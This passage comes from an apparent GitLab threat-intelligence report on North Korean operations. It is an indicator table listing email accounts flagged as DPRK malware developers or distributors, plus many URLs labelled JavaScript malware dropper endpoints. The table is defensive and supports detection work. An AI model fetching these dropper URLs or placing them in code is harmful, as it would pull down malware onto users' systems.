N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nrobert.radwanski@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nroman.bobinski@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nroman.ulanski@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 14 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nstefan.moleski@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\ntaraslysenko@mail.io email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\ncorresol28@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\ncorresol28@outlook.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\npaniker1110@outlook.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nwalterjgould77@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nsupernftier@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nbohuslavskyir@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nartizjusz11@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nbartonfratz@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\ncryptodev26@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\ndeinsulabasil@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nelsaadanifaiek@hotmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nfelipe.debarros@hotmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\ngeordiecuppaidge684@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\ngreatbusinessman517@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\njhmnuykbvgftrss@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nkainmcguire@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nkimberlysunshine137@yahoo.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nkonovalov1256@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nkvashinalexander@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nmarkstevemark85@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 15 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\noleksandrbokii963@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\npaniker1110@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nrubenbolanos19733@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nsimpsonkeith686@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nsonniehutley5@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\ntagi238761@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\nvlulepet9@gmail.com email malware N/A N/A\r\nDPRK malw\r\ndeveloper ac\r\ncnova.business.en@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ndanielmcevily.business918@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njaimetru003@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ndaysabethtederstz7533@hotmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nthiagocosta199295@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ncptrhzv09@hotmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nchainsaw1107@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmutsabsaskajgig0f@outlook.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsnowl3784@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ndieterwang@proton.me email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ncesarpassos4808@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nlazar.master.0204@gmail.com email malware N/A December\r\n2025\r\nDPRK malw\r\ndistributor\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 16 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nGitLab.com\r\nlujancamryn405@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nharryjason19880502@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nfraserhutchison1@hotmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nstovbanoleksandr14@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nramirezhector9299@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmimoriokamoto@gmail.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nwilson.wen2145@outlook.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njasonfissionawgyi08293@outlook.com email malware N/A\r\nDecember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nolelangaard9@gmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmirandacunningham1993@outlook.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njerryjames1997@outlook.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ncaryphillips.business727@gmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsoft.business1103@outlook.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsoft.business1024@outlook.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsoft.business1020@outlook.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsoft.business0987@gmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 17 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nalphabrownsapon70555@hotmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nwelbykchamu4i72@outlook.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\neron4236@gmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nreddixyxzh551438@hotmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsoft.business1112@outlook.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nrichardcook.business93@gmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njamesgolden198852@gmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nerik423131@gmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nalfredogomez1984126@gmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njasonharris198852@gmail.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nxavieryetikqpir36636@outlook.com email malware N/A\r\nNovember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmarcello.armand.tf7@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ngabriel.sanchez255@outlook.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\naronlin712@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nrickcarr1014@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsallydunnet.business1016@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ndr.md.hubert.business916@gmail.com email malware N/A October\r\n2025\r\nDPRK malw\r\ndistributor\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 18 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nGitLab.com\r\ntommyrole0301@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njbutton717@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nlilian.rodrigues.re@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nandrewtilley.us@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ndavidaheld.manager@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nlovelysong0209@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmoreandmore082@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmeirjacob727@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nharry.work206@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nabdelrahman5520032019@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nkarenhooi.cpa.cga.business1016@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ncraigsmith93.business@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\npaulodiego0902@outlook.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nfaelanholtmdjld41341@outlook.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nencar.geric727510@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nirynalavreniuk38@gmail.com email malware N/A\r\nOctober\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 19 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nmelnikoleg995@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nopalinsigniagyprt29567@hotmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nthorneaustinngzsz52979@outlook.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njoshuataub3@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nitspeterszabo@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nxylosmontagueujsvt83787@hotmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nivicastojadin488@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nseed1996017@outlook.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nbryandev0418@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nruslanlarionov77@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsuperdev@outlook.com.au email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ncristhianmartinezrom7@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nnatasa.golubovic90@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nweili.walk@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nafaq91169@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmahmodghnaj1@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nlook.as.united@gmail.com email malware N/A September\r\n2025\r\nDPRK malw\r\ndistributor\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 20 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nGitLab.com\r\nrochaevertondev@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ntabishhassan01998@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ntemorexviashvili17@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nvovalishcn77@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nseed1996015@outlook.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsuryaedg88@hotmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmaurostaver9@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\npleasemeup214@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nvitalii214.ilnytskyi@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nreactangulardev@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nskyearth711@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmigueljose81234@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nseed1996010@outlook.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nblackwang104@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nkagan.hungri@gmail.com email malware N/A\r\nSeptember\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nlittebaby232355@gmail.com email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 21 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nkenycarl92@gmail.com email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\narnas.tf7@gmail.com email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nnandawsu58@hotmail.com email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmagalhaesbruno236@gmail.com email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmartytowne03@gmail.com email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\npeter@trovastra.com email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmartinez@trovastra.com email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\npeterforward@trovastra.com email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nrick.cto@dantelabs.us email malware N/A\r\nAugust\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ntomgleeson92@outlook.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nhuqyyitizomu@hotmail.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ntracykevin5590@gmail.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nseniorsky92@gmail.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmeftaht531@gmail.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ntapiasamjann@gmail.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njohnwatson2327a@gmail.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ndonald.edler0626@gmail.com email malware N/A July 2025 DPRK malw\r\ndistributor\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 22 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nGitLab.com\r\nchrisritter5272@outlook.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nhs8179189@gmail.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ndredsoft@proton.me email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nbloxdev1999@outlook.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nstar712418@gmail.com email malware N/A July 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njackson.murray.tf7@gmail.com email malware N/A June 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nhudsonramsey107@outlook.com email malware N/A June 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsamjanntapia@gmail.com email malware N/A June 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ndyup58725@gmail.com email malware N/A June 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\ndavidfernandez420@outlook.com email malware N/A May 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nscottdavis8188@gmail.com email malware N/A May 2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nsamjannt1211@gmail.com email malware N/A\r\nApril\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nahmed03010229@gmail.com email malware N/A\r\nApril\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nhidranomagica@outlook.com email malware N/A\r\nMarch\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\njackson.blau.eth@gmail.com email malware N/A\r\nFebruary\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nagne09541@gmail.com email malware N/A\r\nFebruary\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 23 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nantontarasiuk0512@gmail.com email malware N/A\r\nFebruary\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nmichael.dilks8500@gmail.com email malware N/A\r\nJanuary\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nignacioquesada127@gmail.com email malware N/A\r\nJanuary\r\n2025\r\nDPRK malw\r\ndistributor\r\nGitLab.com\r\nhttp://chainlink-api-v3.cloud/api/service/token/3ae1d04a7c1a35b9edf045a7d131c4a7\r\nurl malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttp://chainlink-api-v3.cloud/api/service/token/792a2e10b9eaf9f0a73a71916e4269bc\r\nurl malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttp://chainlink-api-v3.com/api/service/token/1a049de15ad9d038a35f0e8b162dff76\r\nurl malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttp://chainlink-api-v3.com/api/service/token/7d6c3b0f7d1f3ae96e1d116cbeff2875\r\nurl malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttp://chainlink-api-v3.com/api/service/token/b2040f01294c183945fdbe487022cf8e\r\nurl malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttp://openmodules.org/api/service/token/f90ec1a7066e8a5d0218c405ba68c58c url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttp://w3capi.marketing/api/v2/node/d6a8d0d14d3fbb3d5e66c8b007b7a2eb url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api-server-mocha.vercel.app/api/ipcheck-encrypted/106 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api-server-mocha.vercel.app/api/ipcheck-encrypted/212 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api-server-mocha.vercel.app/api/ipcheck-encrypted/81 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api-server-mocha.vercel.app/api/ipcheck-encrypted/823 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api-server-mocha.vercel.app/api/ipcheck-encrypted/99 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.mocki.io/v2/8sg8bhsv/tracks/errors/665232 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.npoint.io/159a15993f79c22e8ff6 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.npoint.io/62755a9b33836b5a6c28 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.npoint.io/b1f111907933b88418e4 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.npoint.io/b68a5c259541ec53bb5d url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.npoint.io/c82d987dd2a0fb62e87f url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.npoint.io/d1ef256fc2ad6213726e url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 24 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nhttps://api.npoint.io/d4dfbbac8d7c44470beb url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.npoint.io/e6a6bfb97a294115677d url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.npoint.io/f4be0f7713a6fcdaac8b url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://api.npoint.io/f96fb4e8596bf650539c url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://astraluck-vercel.vercel.app/api/data url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://bs-production.up.railway.app/on url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://getApilatency.onrender.com/checkStatus url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://getpngdata.vercel.app/api/data url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://googlezauthtoken.vercel.app/checkStatus?id=S,T url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://ip-api-test.vercel.app/api/ip-check-encrypted/3aeb34a38 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://ip-check-server.vercel.app/api/ip-check-encrypted/3aeb34a37 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/4NAKK url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/8RLOV url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/CNMYL url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/DMVPT url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/E4YPZ url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/E7GKK url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/FM8D6 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/GLGT4 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/L4T7Y url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/PCDZO url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/PQPTZ url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/WCXNT url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 25 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nhttps://jsonkeeper.com/b/XRGF3 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jsonkeeper.com/b/XV3WO url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://jwt-alpha-woad.vercel.app/api url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://metric-analytics.vercel.app/api/getMoralisData url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://pngconvert-p0kl4fodi-jhones-projects-f8ddbcbe.vercel.app/api url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/linux?flag=3 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/linux?flag=5 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/linux?flag=8 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/mac?flag=3 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/mac?flag=5 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/mac?flag=8 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/windows?flag=3 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/windows?flag=5 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/windows?flag=5 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-config-settings.vercel.app/settings/windows?flag=8 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load-config.vercel.app/settings/linux?flag=3 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load-config.vercel.app/settings/mac?flag=3 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load-config.vercel.app/settings/windows?flag=3 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load.vercel.app/settings/linux?flag=2 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load.vercel.app/settings/linux?flag=4 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load.vercel.app/settings/linux?flag=9 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load.vercel.app/settings/mac?flag=2 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load.vercel.app/settings/mac?flag=4 url malware N/A N/A\r\nJavaScript 